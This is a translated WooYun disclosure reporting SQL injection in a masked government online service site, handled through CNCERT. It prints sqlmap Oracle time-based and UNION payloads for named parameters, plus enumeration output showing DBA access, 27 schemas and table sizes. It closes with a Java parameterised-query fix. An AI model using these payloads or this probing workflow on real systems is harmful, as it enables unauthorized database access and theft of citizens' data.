
Vulnerability summary

Defect ID: wooyun-2015-0144594

Vulnerability title: Multiple query parameters on one port of a sensitive department's online service hall are vulnerable to SQL injection (DBA privileges + 27 databases involved + large amounts of data exposed)

Affected vendor: cncert (National Internet Emergency Center)

Vulnerability author: 路人甲

Submitted: 2015-10-03 09:24

Fixed: 2015-11-24 17:16

Published: 2015-11-24 17:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-03: Details sent to the vendor, awaiting vendor handling
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and relevant domain experts
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public

Brief description:

Multiple queries are vulnerable to SQL injection, with DBA privileges. Sensitive information; admins, please help mask it!

Detailed description:

First, the port on which multiple query parameters are injectable is 8081.
Start by opening

**.**.**.**:8081/tplt/gl2011101612585592.jsp?cid=874

Here the right-hand sidebar has query functions.
1. Injection point one:
Next to it is "Site search".
Capturing the request gives:

**.**.**.**:8081/webcl/showWssb.jsp (POST)
piid=11111111111111111111&col5=13888888888&querycode1=2717


Two fields of the "Processing result query" are injectable: the application number and the mobile number.
piid and col5 are vulnerable to time-based blind injection.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: piid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: piid=11111111111111111111' AND 5906=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(90)||CHR(102)||CHR(71),5) AND 'cZxW'='cZxW&col5=13888888888&querycode1=2717
Place: POST
Parameter: col5
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: piid=11111111111111111111&col5=13888888888' AND 9251=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(113)||CHR(71)||CHR(82),5) AND 'BBQR'='BBQR&querycode1=2717
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: col5, type: Single quoted string (default)
[1] place: POST, parameter: piid, type: Single quoted string
[q] Quit
> 0
[00:06:29] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[00:06:29] [INFO] fetching current user
[00:06:29] [INFO] resumed: NOTA
current user: 'NOTA'
[00:06:29] [INFO] fetching current database
[00:06:29] [INFO] resumed: NOTA
[00:06:29] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[00:06:29] [INFO] testing if current user is DBA
current user is DBA: True


1-1.jpg


database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


Database: NOTA
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| TRIGGER_MESSAGE | 1378479 |
| CRJ_YW_BZJDJGB | 978587 |
+-----------------+---------+


1-2.jpg


27 databases. Because there are so many, and it is blind injection, I did not continue dumping data; besides, it is a government website, so I did not dare go deeper!~~~
On to the next injection point!~~~
2. Injection point two:
"Processing result query", the "declaring entity" field
Capturing the request gives

**.**.**.**:8081/webcl/showWssbList.jsp (POST)
col11=222222222222&col55=13888888888&querycode2=3885


The col11 and col55 parameters are injectable.
Testing with --level 3 added, which found one more payload than at the first injection point.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: col55
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: col11=222222222222&col55=13888888888' UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(119)||CHR(113)||CHR(117)||CHR(113)||CHR(119)||CHR(69)||CHR(105)||CHR(68)||CHR(115)||CHR(119)||CHR(102)||CHR(65)||CHR(86)||CHR(75)||CHR(113)||CHR(104)||CHR(114)||CHR(114)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &querycode2=3885
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: col11=222222222222&col55=13888888888' AND 8334=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(100)||CHR(77)||CHR(108),5) AND 'rNzb'='rNzb&querycode2=3885
Place: POST
Parameter: col11
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: col11=222222222222' UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(119)||CHR(113)||CHR(117)||CHR(113)||CHR(79)||CHR(81)||CHR(108)||CHR(80)||CHR(65)||CHR(88)||CHR(78)||CHR(76)||CHR(99)||CHR(119)||CHR(113)||CHR(104)||CHR(114)||CHR(114)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &col55=13888888888&querycode2=3885
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: col11=222222222222' AND 5724=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(67)||CHR(73)||CHR(105),5) AND 'QTOe'='QTOe&col55=13888888888&querycode2=3885
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: col11, type: Single quoted string (default)
[1] place: POST, parameter: col55, type: Single quoted string
[q] Quit
> 0
[02:28:42] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[02:28:42] [INFO] fetching current user
current user: 'NOTA'
[02:28:42] [INFO] fetching current database
[02:28:42] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[02:28:42] [INFO] testing if current user is DBA
current user is DBA: True


2-1.jpg


2-2.jpg



Database: HR
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| EMPLOYEES | 107 |
| DEPARTMENTS | 27 |
| COUNTRIES | 25 |
| LOCATIONS | 23 |
| JOBS | 19 |
| JOB_HISTORY | 10 |
| REGIONS | 4 |
+-------------------------+---------+
Database: NOTA
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| SERVICE_MESSAGE | 14284896 |
| TRIGGER_MESSAGE | 1378479 |
| CRJ_YW_BZJDJGB | 978587 |
| PROJECTSMS | 141888 |
| CRJ_YW_WSSQ_HGTSQXXB | 57847 |
| CRJ_YW_WSSQ_TWZJBLB | 57677 |
| CRJ_YW_WSSQ_GXRB | 34602 |
| CRJ_YW_WSSQ_JTCYB | 33178 |
| CRJ_YW_WSSQ_QZBLB | 29193 |
| APPLY_DOC | 21602 |
| JITTASK | 18699 |
| CRJ_YW_WSSQ_YYXXB | 17721 |
| JITTASKINSTANCE | 15071 |
| JITTRANSITION | 14922 |
| "CONDITION" | 14129 |
| FLOWSARCHIVE | 14107 |
| WEBFUJIAN | 13065 |
| JITFUJIAN | 11657 |
| APPLY_LAWS | 8117 |
| WEBPROCESSINSTANCE | 4461 |
| JITPROCESSDATA | 4251 |
| JITPROCESSDEFINITION | 4238 |
| PROTYPE_RELATION | 3915 |
| SHOULI | 3813 |
| WORKDATE | 3652 |
| JITPROCESSINSTANCE | 3386 |
| PROJECTINFO | 3271 |
| PROJECTARCHIVES | 3232 |
| QUJIANTAB | 3203 |
| DOCUMENTS | 3104 |
| CRJ_YW_SWDWB | 2911 |
| CRJ_YW_WSSQ_YQRB | 1614 |
| LAWS | 1210 |
| PROJECTSORT | 1060 |
| PROJECTANNEX | 826 |
| CRJ_YW_WSSQ_CXSQXXB | 590 |
| CRJ_YW_WSSQ_BGJZB | 332 |
| CRJ_YW_BZJDCXB | 276 |
| PROJECTINFOMB | 182 |
| DICTIONARY | 165 |
| JITVARIABLEDEFINITION | 108 |
| ADDRESSZD | 92 |
| CRJ_YW_WSSQ_CXSQJGB | 84 |
| HANDUPINFO | 74 |
| PROJECTTBL | 57 |
| PLAN_TABLE | 56 |
| CRJ_YW_WSSQ_WGR_ZJSQB | 53 |
| CRJ_YW_WSSQ_WGR_QZBL_GR | 33 |
| JITFUJIAN2 | 26 |
| CRJ_YW_WSSQ_WGR_XXRB | 13 |
| JITFORMINFO | 12 |
| QJTYPE | 11 |
| DEALWRONG | 10 |
| PROJECTSMSDEFINITION | 7 |
| SCORETYPE | 5 |
| WEBFORM | 4 |
| CHANNEL | 3 |
| DUBANPRO | 3 |
| QJCLASS | 3 |
| TOUSUTYPE | 2 |
| WEBARCHIVES | 2 |
| WORKTIME_STANDARD | 1 |
+-------------------------+---------+
Database: WEBOTA
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| IP_TB | 106804 |
| LOG_TB | 3890 |
| INFO_TB | 3144 |
| MID_CID | 1223 |
| MANAGER_CHANNEL_TB | 829 |
| CHANNEL_TB | 467 |
| WEBFORM | 427 |
| CHANNELBRIEF_TB | 183 |
| MANAGER_TB | 38 |
| TPLT_TB | 25 |
| ROLE_MODULE_TB | 21 |
| INFO_FUJIAN_TB | 20 |
| MODULE_TB | 12 |
| ANSWER_TB | 11 |
| STYLE_TB | 8 |
| TPLT_BACKUP_TB | 7 |
| PARAM_TB | 6 |
| ROLE_TB | 5 |
| VOTE | 5 |
| QUESTION_TB | 4 |
| FILE_TB | 3 |
| GUANGGAO_TB | 3 |
| MANAGER_ROLE_TB | 3 |
| TPLT_SCHEME_TB | 2 |
| TPLT_TYPE_TB | 2 |
| WEATHER_TB | 2 |
| CONFIG_TB | 1 |
| FILECLASS_TB | 1 |
| MANAGER_FILECLASS_TB | 1 |
| VIDEO_TB | 1 |
| WEBCOUNTER_TB | 1 |
+-------------------------+---------+
Database: NOTA_TEMP
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| APPLY_DOC | 15475 |
| JITTASK | 13761 |
| JITTRANSITION | 10637 |
| "CONDITION" | 10178 |
| APPLY_LAWS | 6112 |
| DOCUMENTS | 3785 |
| WORKDATE | 3652 |
| JITPROCESSDATA | 3069 |
| JITPROCESSDEFINITION | 3056 |
| PROTYPE_RELATION | 2985 |
| PROJECTINFO | 2557 |
| LAWS | 894 |
| SHOULI | 283 |
| PROJECTSORT | 250 |
| DICTIONARY | 231 |
| PROJECTANNEX | 205 |
| FLOWSARCHIVE | 125 |
| TRIGGER_MESSAGE | 101 |
| ADDRESSZD | 92 |
| WEBFUJIAN | 74 |
| JITVARIABLEDEFINITION | 61 |
| PLAN_TABLE | 56 |
| PROJECTTBL | 48 |
| PROJECTSMS | 37 |
| JITFUJIAN | 32 |
| QUJIANTAB | 31 |
| JITTASKINSTANCE | 25 |
| WEBPROCESSINSTANCE | 14 |
| QJTYPE | 11 |
| HANDUPINFO | 7 |
| JITPROCESSINSTANCE | 7 |
| PROJECTSMSDEFINITION | 7 |
| JITFORMINFO | 6 |
| KONGSHEN | 5 |
| SCORETYPE | 5 |
| CHANNEL | 3 |
| QJCLASS | 3 |
| TOUSUTYPE | 2 |
| DEALWRONG | 1 |
| NOTSINC | 1 |
| WORKTIME_STANDARD | 1 |
+-------------------------+---------+
Database: WEBOTABASE
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LOG | 32640 |
| SYSOP_LOG | 4165 |
| STRUCTURE | 2847 |
| STAFF | 1497 |
| DEPARTMENT | 1232 |
| ROLERELATE | 252 |
| FLOOR_REL | 28 |
| SYSTEMINFO | 3 |
| MANAGER | 1 |
+-------------------------+---------+


2-3.jpg


This is the main database, with a large amount of information; I stopped here!~~~

Database: NOTA
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| SERVICE_MESSAGE | 14284896 |
| TRIGGER_MESSAGE | 1378479 |
| CRJ_YW_BZJDJGB | 978587 |
| PROJECTSMS | 141888 |
==================================
Database: WEBOTABASE
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LOG | 32640 |
| SYSOP_LOG | 4165 |
| STRUCTURE | 2847 |
| STAFF | 1497 |
=================================


3. Injection point three:

**.**.**.**:8081/tplt/gl2011101612585592.jsp?cid=874
**.**.**.**:8081/changchun/second.jsp?cid=1402
**.**.**.**:8081/baishan/second.jsp?cid=917
**.**.**.**:8081/liaoyuan/second.jsp?cid=909
**.**.**.**:8081/siping/second.jsp?cid=1098
**.**.**.**:8081/tonghua/second.jsp?cid=1106
**.**.**.**:8081/songyuan/second.jsp?cid=1211
**.**.**.**:8081/yanbian/second.jsp?cid=1237
**.**.**.**:8081/baicheng/second.jsp?cid=1122


cid is injectable, but no data could be retrieved; it probably takes an expert to get an injection past the filtering!~~~

3-1.jpg


As for "site search", "driver information query" and "vehicle violation query", the database could not be reached when searching there, so I could not test whether they are injectable; going by the tests above they probably are, but I stopped here@~~~~

Vulnerability proof:

2-1.jpg


2-2.jpg


2-3.jpg


Fix recommendation:

Input filtering
Privilege restriction
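As an added illustration of the two fix items (this is not code from the affected site), the query behind the piid and col5 parameters of showWssb.jsp is shown first as unsafe string splicing and then as a validated, bound PreparedStatement; the table and column names (apply_result, status, mobile) and the validation rules are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

// Added example, not the site's code. Table/column names are assumed.
public class ResultQueryDao {

    // Constructed validation rules: application number is digits only,
    // mobile number is 11 digits starting with 1 (Chinese mobile format).
    private static final Pattern PIID = Pattern.compile("^[0-9]{1,20}$");
    private static final Pattern MOBILE = Pattern.compile("^1[0-9]{10}$");

    // VULNERABLE pattern: request values are spliced into the SQL text.
    // A single quote in piid or col5 closes the literal and whatever follows
    // is parsed as SQL, which is exactly what the time-based and UNION
    // payloads in the sqlmap output above exploit.
    static String vulnerableSql(String piid, String col5) {
        return "SELECT status FROM apply_result WHERE piid='" + piid
                + "' AND mobile='" + col5 + "'";
    }

    // Fix item 1 (filtering): reject anything that is not the expected shape
    // before it reaches the database layer at all.
    static boolean isValid(String piid, String col5) {
        return piid != null && col5 != null
                && PIID.matcher(piid).matches()
                && MOBILE.matcher(col5).matches();
    }

    // HARDENED: bind the values as parameters, so Oracle receives the SQL
    // text and the data separately and never parses user input as SQL.
    static String lookupStatus(Connection conn, String piid, String col5)
            throws SQLException {
        if (!isValid(piid, col5)) {
            throw new IllegalArgumentException("invalid query parameters");
        }
        String sql = "SELECT status FROM apply_result WHERE piid = ? AND mobile = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, piid);
            ps.setString(2, col5);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("status") : null;
            }
        }
    }
}
```

Fix item 2 is independent of the application code: the account the web tier connects with (NOTA in the report, which sqlmap shows as DBA) should hold only SELECT on the tables it needs, so that a remaining injection cannot reach the other schemas listed above.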

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-10-10 17:15

Vendor reply:

CNVD confirms the described situation; it has been forwarded via CNCERT to the Jilin branch center, which will coordinate handling with the website's operating unit. Scored across multiple risk points, rank 12.

Latest status:

None yet